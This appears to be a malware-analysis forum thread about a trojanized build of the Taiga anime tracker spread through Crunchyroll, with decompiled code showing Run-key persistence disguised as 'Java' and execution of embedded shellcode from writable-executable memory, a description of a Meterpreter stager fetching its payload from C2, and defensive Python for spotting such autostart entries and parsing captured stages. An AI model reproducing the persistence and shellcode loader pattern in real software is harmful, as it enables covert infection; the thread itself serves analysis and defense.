Malware from Crunchyroll

Forum for analysis and discussion about malware.
EP_X0FF
Global Moderator
Posts: 4808
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation

Malware from Crunchyroll

Post by EP_X0FF » Sun Nov 05, 2017 3:09 am

Malware targeting viewers of the Chinese porn cartoons. Modified version of Taiga (https://github.com/erengy/taiga/issues/489).

Masterpiece of code (F5 in IDA Pro)

Code:

  // Persistence: write the executable's own path (MAX_PATH = 0x104 wide chars) into
  // HKCU\...\Run as a REG_SZ (type 1) value named "Java"; 0x20006 is KEY_WRITE.
  if ( GetModuleFileNameW(0, &Filename, 0x104u) != -1
    && !RegCreateKeyExW(
          HKEY_CURRENT_USER,
          L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
          0,
          0,
          0,
          0x20006u,
          0,
          &phkResult,
          0) )
  {
    RegSetValueExW(phkResult, L"Java", 0, 1u, (const BYTE *)&Filename, 2 * wcslen(&Filename) + 2);
  }
  // Execution: MEM_COMMIT (0x1000) a PAGE_EXECUTE_READWRITE (0x40) buffer, copy the
  // 0x18B-byte embedded shellcode into it and call it directly.
  v4 = VirtualAlloc(0, 0x18Bu, 0x1000u, 0x40u);
  qmemcpy(v4, &unk_412780, 0x18Bu);
  ((void (*)(void))v4)();
Attached: the modified Taiga and the downloader exe dropped by the above shellcode, which is also implemented through shellcode. I don't have the actual payload it downloads, but I also don't expect anything interesting from it (probably some retarded ransomware, which is not interesting at all in any case).
Ring0 - the source of inspiration
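As an added example for the persistence part of the decompile above (this is not code from the thread, from the sample or from Taiga), here is a small Python check for Run values that borrow the "Java" name while pointing at something that is not a Java binary, or that autostart from a user-writable directory. The list of Java binary names, the user-writable directory pattern and the `SAMPLE_ENTRIES` are my own assumptions and constructed data; on Windows the script reads the live key instead.

```python
"""Flag HKCU Run autostart entries that mimic Java but point elsewhere.

Added example for this thread; not code from the malware or from Taiga.
"""
import ntpath
import re
import sys

RUN_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Binaries a legitimate Java-related autostart would point at (assumption).
JAVA_BINARIES = {"java.exe", "javaw.exe", "jusched.exe", "jucheck.exe"}

# Directories a dropped executable typically persists from (assumption).
USER_WRITABLE = re.compile(r"\\(appdata|temp|tmp|downloads|desktop|public)\\",
                           re.IGNORECASE)


def exe_path(data):
    """Return the executable path from Run value data.

    The sample writes its bare module path, but real entries may be quoted
    and carry arguments, so both forms are handled.
    """
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    return data.split(" ", 1)[0]


def suspicious_run_entries(entries):
    """entries: iterable of (value_name, data) pairs from the Run key.

    Returns a list of (value_name, exe_path, [reasons]) for entries that
    either borrow the Java name without pointing at a Java binary, or
    autostart something from a user-writable directory.
    """
    findings = []
    for name, data in entries:
        path = exe_path(data)
        base = ntpath.basename(path).lower()
        reasons = []
        if "java" in name.lower() and base not in JAVA_BINARIES:
            reasons.append("value name mimics Java but target is not a Java binary")
        if USER_WRITABLE.search(path):
            reasons.append("autostart target lives in a user-writable directory")
        if reasons:
            findings.append((name, path, reasons))
    return findings


def read_hkcu_run():
    """Enumerate the live key. Windows only (uses the winreg module)."""
    import winreg
    entries = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:  # no more values
                break
            entries.append((name, str(data)))
            index += 1
    return entries


# Constructed sample entries: a benign Java updater, a benign Java launcher,
# and one entry of the kind the decompile above writes.
SAMPLE_ENTRIES = [
    ("SunJavaUpdateSched", r'"C:\Program Files\Common Files\Java\Java Update\jusched.exe"'),
    ("Java", r'"C:\Program Files\Java\jre1.8.0_151\bin\javaw.exe" -jar C:\tools\app.jar'),
    ("Java", r"C:\Users\alice\Downloads\Taiga.exe"),
]


if __name__ == "__main__":
    entries = read_hkcu_run() if sys.platform == "win32" else SAMPLE_ENTRIES
    for name, path, reasons in suspicious_run_entries(entries):
        print(f"{name} -> {path}")
        for reason in reasons:
            print("    " + reason)
```

The name/target mismatch is the strong signal here; a user-writable location on its own is only a weak one, since plenty of legitimate per-user software autostarts from AppData, so treat the second reason as context rather than a verdict.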

sysopfb
Posts: 96
Joined: Thu Oct 23, 2014 1:22 am

Re: Malware from Crunchyroll

Post by sysopfb » Sun Nov 05, 2017 8:49 pm

This has a pcap of it downloading a payload from when it was live. Kudos to any.run for reaching out to Bart on Twitter about the pcap.

https://app.any.run/tasks/010df394-dad9 ... 0892cde074

The decoded code from the embedded PE in the modified Taiga program looks like it was based on Metasploit's receive asm code, which just takes a dword value from the C2, then reads in that dword in size before RET-jumping to the new code it downloaded from the C2.

There is also a pcap from when it was live on hybrid-analysis, but the C2 didn't send anything, which makes the code exit.
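As an added example (not code from the sample, from Metasploit or from this thread), the following Python pulls the stage out of a C2-to-victim stream that uses the framing described above: a little-endian dword size first, then that many bytes of stage. It also handles the empty-reply case from the hybrid-analysis capture. The stream is assumed to be the reassembled TCP payload from the pcap (follow the TCP conversation in Wireshark or tshark and save the server side as raw bytes); the "kind" guess and all sample streams are constructed by me.

```python
"""Extract a length-prefixed stage from a captured C2-to-victim byte stream.

Added example for this thread, not code from the sample or from Metasploit.
Assumed framing: the first four bytes the C2 sends are a little-endian dword
giving the stage size, immediately followed by that many bytes of stage.
"""
import hashlib
import struct


def parse_stage(stream):
    """stream: bytes the C2 sent, in order, reassembled from the pcap.

    Returns a dict describing the stage, or None when the C2 sent nothing
    (the case in which the stager just exits).
    """
    if len(stream) < 4:
        return None  # not even a length dword: server hung up or sent nothing
    (declared,) = struct.unpack("<I", stream[:4])
    stage = stream[4:4 + declared]
    if stage[:2] == b"MZ":
        kind = "PE image (header first, e.g. a reflectively loaded DLL)"
    else:
        kind = "raw position-independent code"
    return {
        "declared_length": declared,
        "received_length": len(stage),
        "complete": len(stage) == declared,
        "kind": kind,
        "sha256": hashlib.sha256(stage).hexdigest(),
        "trailing_bytes": len(stream) - 4 - len(stage),  # traffic after the stage
    }


# Constructed test streams: a 64-byte fake "PE" stage behind its length dword,
# followed by 8 bytes of later traffic. No real stage is embedded.
FAKE_STAGE = b"MZ" + b"\x90" * 62
SAMPLE_STREAM = struct.pack("<I", len(FAKE_STAGE)) + FAKE_STAGE + b"\x00" * 8
TRUNCATED_STREAM = SAMPLE_STREAM[:20]   # capture cut off mid-stage
EMPTY_STREAM = b""                      # C2 answered with nothing


if __name__ == "__main__":
    for label, data in [("full", SAMPLE_STREAM),
                        ("truncated", TRUNCATED_STREAM),
                        ("empty", EMPTY_STREAM)]:
        print(label, parse_stage(data))
```

The SHA-256 of the extracted stage is what you compare against sandbox reports or share as an indicator; `complete` tells you whether the capture actually holds the whole stage before you spend time on it, and a non-zero `trailing_bytes` means there is post-stage traffic worth looking at separately.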

sysopfb
Posts: 96
Joined: Thu Oct 23, 2014 1:22 am

Re: Malware from Crunchyroll

Post by sysopfb » Mon Nov 06, 2017 2:08 pm

Payload on that pcap was metsrv, Meterpreter's fileless stager.
